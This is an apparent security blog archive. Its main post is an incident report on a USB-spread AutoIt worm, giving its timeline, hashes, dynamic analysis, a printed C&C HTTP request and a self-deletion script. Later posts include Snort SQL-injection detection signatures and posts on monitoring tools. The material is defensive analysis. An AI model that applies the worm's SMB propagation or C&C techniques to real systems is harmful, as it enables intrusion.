Archive for the NSM Category

Private Investigations

Posted in Case Studies, General Security, Malware, NSM, Why watch the wire? on 25 May, 2010 by Alec Waters

The following is a sanitised excerpt from an after action report on a malware infection. Like the song this post is named after, the report goes all the way from “It’s a mystery to me” to “What have you got to take away?”. The report is in two parts:

  • Firstly, a timeline of events that was constructed from the various forms of log and network flow data that are routinely collected. Although not explicitly cited in this report, evidence exists to back up all of the items in the timeline
  • The second part is an analysis of the cause of all the mischief

To set the scene, the mystery to be unraveled concerned two machines on an enterprise network which reported that they had detected and removed malware. Detected and removed? Case closed, surely? Never ones to let a malware detection go uninvestigated, we dig deeper…

Part One – Timeline of events

Unknown time, likely shortly before 08:12:37 BST
Ian Oswald attaches a USB stick to his computer. $AV_VENDOR does nothing, either because it detects no threat or because it isn’t working properly. The last message from $AV_VENDOR on Ian’s machine to $AV_MANAGEMENT_SERVER was on 30th January 2009, suggesting the latter is the case.

Based upon subsequent activity, malware is active on Ian’s machine at this point, and is running under his Windows account as a Domain Administrator. The potential for mischief is therefore largely unconstrained.

08:12:37 BST
Ian’s machine ($ATTACKER) requests the URL:

http://www.whatismyip.com/automation/n09230945.asp

This returns a page containing the outside global IP address of Ian’s machine (i.e., the IP address it will appear to have when communicating with hosts on the Internet).

Something on Ian’s machine now knows “where it is” on the Internet.

It is likely that the inside local IP address of Ian’s machine (192.168.1.11) is also determined at this point, so something on Ian’s machine also knows “where it is” within the enterprise.

08:12:39 BST
Ian’s machine requests the URL:

http://geoloc.daigu­o.com/?self

This is a geolocation site, and returns the string containing a country code.

Something on Ian’s machine now knows “where it is” geographically.

08:12:56 BST
Ian’s machine attempts to download a hostile executable. This download is blocked by $URLFILTER, which is fortunate because at the time the executable was not detected as a threat by $AV_VENDOR.

NOTE – Subsequent analysis of the executable confirms its hostile nature; detailed discussion is out of the scope of this report, but a command and control channel was observed, and steganographic techniques were used to conceal the download of further malware by hiding an obfuscated executable in the Comments extension header of a gif file.

NOTE – It was not known until later in the investigation if Ian’s machine already knew where to download the executable from, or if a command and control channel was involved. Ian’s machine was running Skype at the time, which produces sufficient network noise to occlude such a channel when only network session information is available to the investigator.

After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

8:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

9:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

9:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.

On $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not a safe assumption to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary, first four bytes is the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del “C:\gxcinr.exe”
    if exist “C:\gxcinr.exe” goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 ­ TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively unlimiting the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy was applied, then the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Advertisements

Rear echelon NSM

Posted in General Security, NSM on 20 April, 2010 by Alec Waters

When it comes to any kind of traffic analysis device, proper placement is of critical importance – if it’s in the wrong place on the network, it won’t be able to see what you hope it will, and you’ll be blind to any badness that it could potentially detect.

If you work for the kind of company that develops (and subsequently hosts or supports) interactive web applications for clients, having a sensor keep watch over a your Internet-facing production servers is probably a good idea. However, how did all of your clients’ web application goodness get onto a production server in the first place? With a bit of luck, each application started its life on some kind of private development server, after which it moved onto a public user acceptance testing (UAT) server for the client to take a look at. Only after client sign-off would it have moved to the production server.

I think that it’s a good idea to place sensors to watch over the seemingly less-important development and UAT servers, too. Let’s take each in turn:

Development Servers

Dev boxes are usually well within an organisation’s perimeter, behind firewalls and the like. Why would anyone try to take hostile action against a dev server? Surely if an attacker was even in a position to do so, you’d have far greater problems than attacks on the dev server – you’d have an attacker roaming at will within the castle walls. So what’s the point?

Well, here’s an example. Let’s say your sensor is loaded up with a whole bunch of signatures that attempt to detect various classes of web attack (SQL Injection, XSS, etc.), and you’ve got developers who just love technologies like AJAX and JSON. It’s terribly useful to have an AJAX request return some JSON-formatted data, a bit like the example here (seems to work OK in IE and FireFox). Type the letter A into the first textbox, and an AJAX request is made to the server which returns a JSON-formatted resultset of people whose names begin with A (fire up Wireshark and take a look at the requests for /specials/ajax_autosuggest/test.php). This resultset can then be parsed by the browser, and the data processed in whatever manner is necessary. Powerful stuff!

There’s nothing wrong with the example on the page above, but AJAX can go pear shaped if a developer is tempted to embed raw SQL sentences into the request (or even partial sentences like ‘where’ clauses). AJAX requests are under-the-bonnet affairs that don’t appear in the browser’s Location bar so it’s easy to think that they are out of sight and out of mind, when they can often be run directly and outside of their intended context. Any attacker worth their salt will discover and leverage a vulnerable AJAX page, and if there’s raw SQL in it it’s bad news for the application concerned – you’re offering them the chance to execute arbitrary SQL against your server.

So how can NSM help? With a bit of luck, our sensor has signatures like the ones below that stand a chance of picking up raw SQL elements in AJAX requests:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql insert injection atttempt – GET parameter”; flow:established,to_server; uricontent:”insert”; nocase; pcre:”/insert\s+into\s+[^\/\\]+/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13513; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql exec injection attempt – GET parameter”; flow:established,to_server; uricontent:”exec”; nocase; pcre:”/exec\s+master/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13512; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql update injection attempt – GET parameter”; flow:established,to_server; uricontent:”update”; nocase; pcre:”/update\s+[^\/\\]+set\s+[^\/\\]+/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:7;)

etc…

If signatures like these start firing whilst a new application is under development (and not under attack), it’s time to talk to the developers. Better to nip a vulnerability like this in the bud pre-deployment than to rush out an emergency hotfix post-breach. Even if the SQL isn’t exploitable (can you prove it?), you’re still giving too much away in the form of table and column names.

As an added bonus, an NSM sensor with full-packet capture capability can be used as a handy debugging aid when an obscure browser doesn’t work as expected – there ain’t no substitute for the actual HTTP transaction at times like these!

UAT Servers

These boxes are often sitting on the Internet proper so that the client can come along and review and test pre-release versions of the application. By definition, these are test servers, and may therefore have bugs and vulnerabilities that will hopefully be ironed out during the testing cycle; error reporting may also be turned up to the most verbose level to help the process. There may also be other code present for other projects, or experimental code left by someone wanting to test a theory, or all manner of other flotsam and jetsam.

All of this is advantageous to an attacker, and may eventually allow them access to the server. UAT boxes sometimes need to have “real” customer data on them for realistic testing, which makes them just as high-value a target as the production box. What if the UAT server is also a staging area for deployment? What if an attacker could add their own backdoor code into the staging area, ready for deployment later on?

Dismissing the need to monitor development and UAT servers because “they’re not live machines” sounds like a recipe for trouble to me. You need to protect your assets at all stages of their lifecycle, from the initial brainstorming to the great fdisk in the sky!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

(Mis)reading the runes

Posted in General Security, NSM on 16 February, 2010 by Alec Waters

Richard’s post over here talks about the “Intruder’s Dilemma”:

The defender only needs to detect one of the indicators of the intruder’s presence in order to initiate incident response within the enterprise.

I agree wholeheartedly. However, the wonderful thing about Indicators is that there can be lots and lots of them, and interpreting them can be tricky. Sometimes it’s easy to misinterpret what they’re telling you, and sometimes it’s tempting to focus 100% on the first or most prominent Indicator observed, ignoring (or not looking for) other ones that will add context and detail to the overall situation.

Take for example the Indicator in the picture below. What are we looking at?

  1. An enclosure at a wildlife park, or
  2. Some kind of strip club?

I was pretty disappointed when I went in, because:

  • For some reason, I had chosen to focus on my first interpretation of the Indicator, and
  • I had failed to take into account any unfavourable counter-Indicators that contradicted my assessment (the most prominent of which was being at a zoo at the time)

A while back, we had a problem with one of our systems – ProcessA wasn’t able to talk to ProcessB (the “security” slant here is that we’re dealing with a compromise of the “availability” facet of the CIA Triad). The system wasn’t working, and ProcessA had left loads of Indicators in the form of log entries which said “I tried to talk to ProcessB on port 1234 but I couldn’t”. ProcessA was clearly working at this point (otherwise there would have been no log entries), so the initial interpretation of the Indicator was that ProcessB was in some way at fault.

Cue the usual troubleshooting process:

  • Is ProcessB running? Yes.
  • Is ProcessB accepting requests right now? Yes, it seems to be working. The error messages from ProcessA are intermittent.
  • Was ProcessB running at the time ProcessA logged the messages? Yes. ProcessB logs startup/shutdown messages, and there aren’t any for this particular timeframe.
  • Was there some kind of network problem? Unlikely, since ProcessA and ProcessB are running on the same server.
  • Are you sure it wasn’t the network? Given the above, the network really can’t have much of a hand in this!
  • But ProcessB listens on IP address 1.2.3.4, which is bound to a physical interface. If that interface went down, wouldn’t ProcessB’s ability to listen be affected? Yes, but logs from the switch that the server connects to don’t show any up/down events for the interface concerned.

And so it went on, for several hours. ProcessB was deemed to be at fault, yet we couldn’t find anything wrong with it. The troubleshooting had become bogged down because:

  1. We were proceeding under the assumption that ProcessB was broken (I mean, duh!! ProcessA wouldn’t have left all those log messages if ProcessB were working, would it?!?)
  2. We were ignoring a gigantic counter-Indicator, namely “there’s nothing wrong with ProcessB”.

It generally takes two to tango, something that applies as much to TCP comms as anything else. If the server’s not at fault, perhaps it’s the client, ProcessA?

As it turns out, ProcessA was indeed the one with the problem. An errant service, ProcessZ, had been leaving thousands of sockets in the CLOSE_WAIT state (this almost always indicates a problem with the software, rather than an expected TCP phenomenon). Eventually, it got to the point where the tango-ing ProcessA needed a client socket to talk to ProcessB, but there weren’t any ephemeral ports available because ProcessZ had, over time, left them all in CLOSE_WAIT (Windows Server 2003 only allows for 5000 ephemeral ports by default). Lacking a client socket with which to talk to ProcessB, ProcessA therefore duly logs a message to say that “I tried to talk to ProcessB on port 1234 but I couldn’t”…

Restarting ProcessZ was a temporary band-aid – all the sockets in CLOSE_WAIT went away, and ProcessA danced the night away with ProcessB.

The moral of the story? Don’t take isolated Indicators at face value. There will almost always be other Indicators that either back up or refute your assessment – all you have to do is look for them.

The other moral of the story? Very few zoos have strip clubs 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Making sense of the results of the net-entropy experiment

Posted in Crazy Plans, net-entropy, NSM on 19 January, 2010 by Alec Waters

The rest of the net-entropy saga is listed here, but to briefly recap, net-entropy is a tool that can be used to profile the level of “randomness” of network traffic. High entropy traffic like this is usually either encrypted or compressed in nature, and I’m definitely interested in knowing about the presence of the former on my network. I’ve been using net-entropy as a general purpose “randomness detector”, something that the author didn’t really have in mind when he wrote it.

However, drawing meaningful conclusions from the results gathered can be tricky (this is nothing to do with net-entropy itself, and everything to do with the way I’m using it backwards to generically detect randomness). Some of the observed high entropy traffic will definitely fall into the “encrypted” category, like SSH and Remote Desktop. Other stuff will definitely be of the “compressed” flavour, like RTMP on port 1935.

Once this kind of low-hanging fruit has been pruned, the analyst is left with a whole load of unknown high-entropy traffic. If net-entropy’s presence is to be of any value at all when deployed this way, we have to try to make sense of the residual data in some way or another.

One tactic is to fire up Sguil and use its full-content capture to extract and examine each of the unknown high-entropy streams in turn. This is massively labour intensive, but some of the time you’ll find something interesting like HTTPS on a non-standard port (the certificate exchange at the start of the conversation is in clear text, giving you a clue). Most of the time however, you’re left looking at unintelligible garbage. Unsurprising really, given that it’s likely to be either compressed or encrypted…

Given that protocols like SSH, RDP and RTMP can most usually be identified by their port numbers alone and what’s left is unreadable junk, how are we to derive value from these other indicators from net-entropy? I can think of a couple of ways:

  • Session contextualisation
  • Session profiling on the basis of session duration and frequency, etc

Putting a high-entropy session into context isn’t too labour intensive, and sometimes pays dividends. Let’s say net-entropy has spotted a session from 1.2.3.4:25333 to 4.3.2.1:3377; the full-content capture is unreadable garbage, and the port numbers offer no clues. If we ask the question “was there any other traffic involving 1.2.3.4 and 4.3.2.1 at the same time”, we might get a hint. In this instance, there was a connection from 1.2.3.4:16060 to 4.3.2.1:21, which looks like an FTP command session judging by the port number. When we examine the full-content capture for this session, we can see passive FTP at work:

227 Entering Passive Mode (4,3,2,1,13,49).

The last two numbers denote the port that the client should connect to to transfer a file. Doing the maths, we see that (13 * 256) + 49 = 3377, so we can be pretty confident that our high-entropy traffic in this case was a file transferred over FTP.

If context can’t be established however, all is not lost – we can look at other attributes of the traffic.

A lot of the high-entropy traffic that we see is bound for random ports on IP addresses all over the world, and most of it is related to peer-to-peer apps. In the case of Skype, high-entropy TCP traffic is usually signaling traffic to SuperNodes. Traffic to a given SuperNode  will occur little-and-often for a long period of time until one of the two endpoints goes offline, so net-entropy will be sending you alerts all day long for that specific destination. However, you certainly can’t say for sure that traffic matching this profile is definitely Skype (it could be a keylogger phoning home at regular intervals, for example). As such, examination of the little-and-often class of high-entropy flow doesn’t usually yield any definitive conclusion.

What is definitely interesting is where you have many high-entropy flows to the same destination address and port in a short period of time. We have detected the following by taking this “clustering” approach:

  • HTTP on a non-standard port, serving up images (most image formats are compressed, and thereby have a high-entropy signature). As an example, some of the images in search results here come from port 7777. Someone browsing this site will trigger many indicators from net-entropy in a short space of time that refer to this port.
  • HTTP proxies. Again, the high-entropy traffic is most commonly as a result of images being transferred.
  • SSL/TLSv1 on port 8083, which turned out to be traffic to a SecureSphere web application firewall.

Clusters like this are most easily detected by eye by means of visualisation. The following image is from one of my Cisco MARS reports, and shows a cluster of traffic to port 8083 in orange:

Something “worth looking at” will usually be quite clear from an image like this.

The approach I’ve taken with net-entropy has yielded neither precise nor definitive results (which certainly isn’t a complaint about net-entropy itself – it was never designed to be used the way I’m using it). But, I’ve discovered things that I’d never have known about without it, so I reckon I’ve come out on top!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5’s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae
Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than believing it to be effective, we need to make sure it is effective through strategies like the collection of information and the (unceasing) vigilance to detail required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

net-entropy Sguil agent and wiki

Posted in net-entropy, NSM, Sguil on 6 October, 2009 by Alec Waters

The story so far:

I’ve written a basic Sguil agent that will upload net-entropy’s RISING ALARM messages into Sguil. You can download the agent here, and the config file here.

On a Sguil sensor that has net-entropy installed, copy the agent to wherever your other agents live (/usr/local/bin on my system), and the config file to where your other config files live (/etc/nsm/sensor1/ on my system). Then fire it up:

net-entropy_agent.tcl
   -c /etc/nsm/sensor1/net-entropy_agent.conf

With a bit of luck, you’ll see the agent register in the Sguil client:

net-entropy sguilAnd we’ll start to see net-entropy messages appear, too:

net-entropy sguil eventsThe bottom right pane of the Sguil client will behave as it does for the PADS agent, and will show you the event detail:

net-entropy sguil detailSguil will correlate these events in the usual fashion, and allow you to right-click and say “Transcript” or “Wireshark”. It all seems to work pretty well!

Finally, the net-entropy project has a new wiki – it’s here. This is the place to go for the latest source code, which now includes a Paninski entropy estimator in addition to the original Shannon estimator. Have fun!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Detecting encrypted traffic with net-entropy, part two

Posted in Crazy Plans, net-entropy, NSM on 24 September, 2009 by Alec Waters

Back here I described my setup of a modified version of net-entropy, which I was going to use in my quest to detect encrypted traffic. Well, it’s been running for a week or so now, and I’ve got some results.

  • Did it detect encrypted traffic? Yes!
